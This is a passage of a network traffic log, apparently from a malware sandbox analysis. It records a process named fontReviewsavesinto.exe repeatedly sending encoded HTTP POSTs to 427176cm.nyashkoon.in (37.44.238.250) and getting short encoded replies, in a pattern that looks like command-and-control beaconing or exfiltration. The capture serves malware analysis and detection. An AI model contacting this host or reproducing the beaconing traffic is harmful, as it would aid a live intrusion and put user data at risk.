                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:12:46.396395922 CET | 1032 | OUT | Data Raw: 5e 5d 43 5a 59 5c 5f 56 5e 5e 54 55 56 53 5a 5b 5f 51 59 50 52 50 52 5a 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: ^]CZY\_V^^TUVSZ[_QYPRPRZYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[-'1;'-!024/($)C'0,*$_3.'$;7>:&G!']*
                                        Nov 5, 2024 08:12:46.857409000 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:12:47.001858950 CET | 158 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:12:44 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        33 | 192.168.2.7 | 49933 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:12:47.134038925 CET | 311 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:12:47.490169048 CET | 1032 | OUT | Data Raw: 5b 58 43 53 59 5e 5a 53 5e 5e 54 55 56 53 5a 50 5f 53 59 5c 52 51 52 5e 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: [XCSY^ZS^^TUVSZP_SY\RQR^YR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.F'<Z$%_314Z/3?6(Z$Z'_).=$Y&=+0++=&G!']*
                                        Nov 5, 2024 08:12:47.945344925 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:12:48.018330097 CET | 158 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:12:45 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        34 | 192.168.2.7 | 49939 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:12:48.149640083 CET | 311 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:12:48.505789042 CET | 1032 | OUT | Data Raw: 5b 5a 43 5b 5c 58 5a 55 5e 5e 54 55 56 5c 5a 50 5f 5b 59 51 52 5a 52 5b 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: [ZC[\XZU^^TUV\ZP_[YQRZR[YR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.'1#'%3 _,<)&70/X>$Z.]$[;3;=:&G!']*?


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        35 | 192.168.2.7 | 49941 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:12:48.543176889 CET | 311 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1300
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:12:48.896238089 CET | 1300 | OUT | Data Raw: 5e 5d 43 5d 59 55 5a 5c 5e 5e 54 55 56 53 5a 5f 5f 52 59 5b 52 5f 52 58 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: ^]C]YUZ\^^TUVSZ__RY[R_RXYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.$8Y3=&$!(/;=%,?_(=T'&>#'++)*&G!']*
                                        Nov 5, 2024 08:12:49.357350111 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:12:49.434143066 CET | 308 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:12:47 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 152
                                        Connection: keep-alive
                                        Data Raw: 0d 15 39 1c 25 28 33 0f 20 04 36 1f 2a 3e 28 5a 36 24 27 10 3b 2d 24 1f 33 0a 28 1e 29 2c 32 1b 20 17 32 5a 21 04 30 15 37 3e 01 57 3e 31 2f 5a 07 10 26 01 32 0b 34 0d 26 3e 28 58 33 55 30 06 3e 12 28 5c 22 2b 27 1f 31 3b 29 5a 25 03 37 51 2f 29 31 53 2d 3b 34 07 39 31 02 1c 32 34 2c 54 0d 10 3a 0a 29 08 20 11 3e 12 26 00 27 34 27 0c 22 3e 23 13 3d 2a 01 0e 3c 13 2a 5e 30 09 2b 0e 36 1c 0b 53 32 05 01 04 33 08 20 50 32 18 25 55 2c 03 2e 56 0f 30 57 51
                                        Data Ascii: 9%(3 6*>(Z6$';-$3(),2 2Z!07>W>1/Z&24&>(X3U0>(\"+'1;)Z%7Q/)1S-;49124,T:) >&'4'">#=*<*^0+6S23 P2%U,.V0WQ


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        36 | 192.168.2.7 | 49942 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:12:48.666261911 CET | 311 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:12:49.021331072 CET | 1032 | OUT | Data Raw: 5e 58 43 5d 5c 5d 5a 55 5e 5e 54 55 56 59 5a 51 5f 51 59 58 52 59 52 58 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: ^XC]\]ZU^^TUVYZQ_QYXRYRXYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.@31/3=!]$;/;0_><%/#Y*=6T3Z6_07'7\)*&G!']*+
                                        Nov 5, 2024 08:12:49.476536989 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:12:49.559555054 CET | 158 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:12:47 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        37 | 192.168.2.7 | 49948 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:12:49.680170059 CET | 287 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Nov 5, 2024 08:12:50.038290024 CET | 1032 | OUT | Data Raw: 5b 5e 43 5a 5c 5d 5a 53 5e 5e 54 55 56 58 5a 5c 5f 51 59 50 52 5a 52 5a 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: [^CZ\]ZS^^TUVXZ\_QYPRZRZYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[-$2 ['.!'2/;Y>C73'(.!'1$'%+$*&G!']*/
                                        Nov 5, 2024 08:12:50.482801914 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:12:50.556415081 CET | 158 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:12:48 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        38 | 192.168.2.7 | 49957 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:12:50.682934999 CET | 311 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:12:51.037007093 CET | 1032 | OUT | Data Raw: 5b 5f 43 52 5c 58 5a 5c 5e 5e 54 55 56 5d 5a 5a 5f 53 59 51 52 5d 52 50 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: [_CR\XZ\^^TUV]ZZ_SYQR]RPYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.%!<[$1]38+)%+0==-'*X&-#084=&G!']*
                                        Nov 5, 2024 08:12:51.505243063 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:12:51.586843967 CET | 158 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:12:49 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        39 | 192.168.2.7 | 49964 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:12:51.709793091 CET | 311 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:12:52.068077087 CET | 1032 | OUT | Data Raw: 5e 5a 46 58 5c 59 5a 53 5e 5e 54 55 56 53 5a 58 5f 52 59 5b 52 58 52 5b 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: ^ZFX\YZS^^TUVSZX_RY[RXR[YR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.3T/'=>3'8,X>&4[',7*2P%,3=+%8;+:&G!']*
                                        Nov 5, 2024 08:12:52.531138897 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:12:52.612224102 CET | 158 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:12:50 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        40 | 192.168.2.7 | 49970 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:12:52.951339960 CET | 311 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:12:53.302524090 CET | 1032 | OUT | Data Raw: 5b 58 43 5b 59 5f 5a 51 5e 5e 54 55 56 59 5a 5a 5f 5b 59 5b 52 5f 52 50 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: [XC[Y_ZQ^^TUVYZZ_[Y[R_RPYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.$"3=-'";)4X' =-"$,50[;]3;+*&G!']*+
                                        Nov 5, 2024 08:12:53.767466068 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:12:53.839678049 CET | 158 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:12:51 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        41 | 192.168.2.7 | 49976 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:12:53.961875916 CET | 311 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1028
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:12:54.318248987 CET | 1028 | OUT | Data Raw: 5e 5f 43 5e 5c 5f 5a 5c 5e 5e 54 55 56 5a 5a 58 5f 55 59 58 52 5b 52 5d 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: ^_C^\_Z\^^TUVZZX_UYXR[R]YR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[-3/3>:$-+#)','Y>W%<)''Y$8]>*&G!']*#


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        42 | 192.168.2.7 | 49981 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:12:54.449596882 CET | 311 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1300
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:12:54.802529097 CET | 1300 | OUT | Data Raw: 5b 54 46 58 59 5e 5a 5d 5e 5e 54 55 56 5c 5a 59 5f 54 59 5e 52 51 52 5c 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: [TFXY^Z]^^TUV\ZY_TY^RQR\YR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[-%" _'-=Y$4[,#*%$0,(==3"]$.('$>:&G!']*?
                                        Nov 5, 2024 08:12:55.271466017 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:12:55.351783991 CET | 308 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:12:53 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 152
                                        Connection: keep-alive
                                        Data Raw: 0d 15 3a 07 25 28 23 0f 37 2a 3e 50 3f 3d 24 10 21 09 3b 1e 2c 13 2b 01 33 0a 23 0b 2a 01 29 08 20 00 2e 59 36 3d 0d 07 23 2e 02 0b 2a 0b 2f 5a 07 10 25 5a 25 22 0a 0a 31 07 2c 5a 24 1d 3f 18 28 3c 28 12 21 28 3b 5b 27 2b 29 5a 25 04 2f 19 38 07 3d 52 2d 28 37 18 2f 21 30 1c 26 1e 2c 54 0d 10 39 56 2a 0f 0e 57 3e 3c 39 1a 26 24 2b 0a 34 13 06 07 3e 14 28 50 3f 04 3e 5f 25 20 24 51 22 0c 04 0e 32 38 38 5c 30 0f 09 08 25 08 25 55 2c 03 2e 56 0f 30 57 51
                                        Data Ascii: :%(#7*>P?=$!;,+3#*) .Y6=#.*/Z%Z%"1,Z$?(<(!(;['+)Z%/8=R-(7/!0&,T9V*W><9&$+4>(P?>_% $Q"288\0%%U,.V0WQ


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        43 | 192.168.2.7 | 49982 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:12:54.571856976 CET | 311 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:12:54.927478075 CET | 1032 | OUT | Data Raw: 5b 59 43 53 5c 5a 5a 53 5e 5e 54 55 56 5b 5a 5f 5f 55 59 58 52 5e 52 5e 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: [YCS\ZZS^^TUV[Z__UYXR^R^YR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[-%"$X'$",;(_*%$,8*13<&^&.#_0$>&G!']*#
                                        Nov 5, 2024 08:12:55.391133070 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:12:55.468451023 CET | 158 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:12:53 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        44 | 192.168.2.7 | 49988 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:12:55.772269964 CET | 287 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Nov 5, 2024 08:12:56.130708933 CET | 1032 | OUT | Data Raw: 5b 5e 43 59 5c 5a 5f 50 5e 5e 54 55 56 59 5a 50 5f 51 59 5e 52 59 52 5e 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: [^CY\Z_P^^TUVYZP_QY^RYR^YR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.A$,X%-1%!8-;+=%4^'Z?Z(.-3<20=+$(X>&G!']*+
                                        Nov 5, 2024 08:12:56.582828999 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:12:56.670603037 CET | 158 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:12:54 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        45 | 192.168.2.7 | 49995 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:12:56.790093899 CET | 311 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:12:57.146174908 CET | 1032 | OUT | Data Raw: 5e 5e 46 59 5c 5a 5a 5d 5e 5e 54 55 56 53 5a 5a 5f 5b 59 58 52 5e 52 51 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: ^^FY\ZZ]^^TUVSZZ_[YXR^RQYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[-$,X'.&07,+^)%07_>*P'%'> $83Y=&G!']*
                                        Nov 5, 2024 08:12:57.603951931 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:12:57.679702044 CET | 158 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:12:55 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        46 | 192.168.2.7 | 50003 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:12:57.831782103 CET | 311 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
